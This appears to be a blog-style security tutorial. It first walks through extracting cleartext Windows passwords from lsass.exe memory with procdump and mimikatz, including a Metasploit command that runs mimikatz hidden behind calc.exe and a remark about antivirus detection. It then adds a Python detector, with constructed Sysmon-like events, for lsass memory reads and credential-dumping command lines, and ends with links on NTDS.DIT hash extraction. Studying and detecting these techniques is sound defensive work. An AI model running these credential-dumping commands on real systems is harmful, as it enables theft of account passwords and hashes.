Benjamin Delpy found that the Windows process lsass.exe stores passwords in memory in a reversible way.
He then developed a great tool called "mimikatz"; the following lines are the steps to get some cleartext passwords.
Use "procdump", a Sysinternals tool from Microsoft (Mark Russinovich), to dump the memory of the lsass.exe process
(download: http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx)
> procdump -accepteula -ma lsass.exe lsass.dmp
Run mimikatz and enable debug mode
> privilege::debug
Switch to minidump mode and load lsass.dmp
> sekurlsa::minidump lsass.dmp
Another way is to run mimikatz live on the target at runtime, but it is not stealthy (some AV products flag it)
Run mimikatz in debug mode
> privilege::debug
Get the passwords from memory
> sekurlsa::logonPasswords
You can also use Mimikatz from Metasploit:
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'
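From the defender's side, the steps above leave a recognisable trail: a process reading lsass.exe memory (Sysmon Event ID 10 with PROCESS_VM_READ granted) and command lines containing procdump targeting lsass or sekurlsa:: modules. The following detection logic is an added example, not code from the original post or from mimikatz; the events are constructed in a simplified Sysmon-like key=value format rather than taken from real logs.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events (simplified Sysmon-like key=value lines, not real logs).
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Tools\procdump.exe CommandLine="procdump -accepteula -ma lsass.exe lsass.dmp"',
    r'EventID=10 SourceImage=C:\Tools\procdump.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1FFFFF',
    r'EventID=10 SourceImage=C:\Windows\System32\svchost.exe TargetImage=C:\Windows\System32\lsass.exe GrantedAccess=0x1000',
    r'EventID=1 Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe readme.txt"',
]

# Windows access right required to read another process's memory (needed for a full dump).
PROCESS_VM_READ = 0x0010

# key=value pairs; values are either quoted (may contain spaces) or a single token.
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value line into a dict, stripping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def is_lsass_memory_read(ev: Dict[str, str]) -> bool:
    """Event 10 where lsass.exe is opened with memory-read access."""
    if ev.get("EventID") != "10":
        return False
    if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return False
    granted = int(ev.get("GrantedAccess", "0"), 16)
    return bool(granted & PROCESS_VM_READ)


def is_credential_dump_cmdline(ev: Dict[str, str]) -> bool:
    """Process creation whose command line points at lsass dumping or sekurlsa modules."""
    cmd = ev.get("CommandLine", "").lower()
    if "sekurlsa::" in cmd:
        return True
    return "procdump" in cmd and "lsass" in cmd


def detect(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (rule_name, offending_image) for every event that matches a rule."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if is_lsass_memory_read(ev):
            alerts.append(("lsass_memory_read", ev.get("SourceImage", "?")))
        elif is_credential_dump_cmdline(ev):
            alerts.append(("credential_dump_cmdline", ev.get("Image", "?")))
    return alerts


if __name__ == "__main__":
    for rule, image in detect(SAMPLE_EVENTS):
        print(f"ALERT {rule}: {image}")
```

The svchost.exe event is deliberately left unflagged: it opens lsass.exe with only PROCESS_QUERY_LIMITED_INFORMATION (0x1000), which is routine and does not permit reading memory.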
Thanks to the great Benjamin Delpy:
http://blog.gentilkiwi.com/securite/mimikatz/minidump
http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html
Another interesting vector is extracting hashes from NTDS.DIT (the Active Directory database):
http://blog.spiderlabs.com/2013/11/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system-.html
http://neobits.org/extracting-ntds-dit-from-a-live-domain-controller-the-easy-way/
http://bernardodamele.blogspot.pt/2011/12/dump-windows-password-hashes_16.html
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/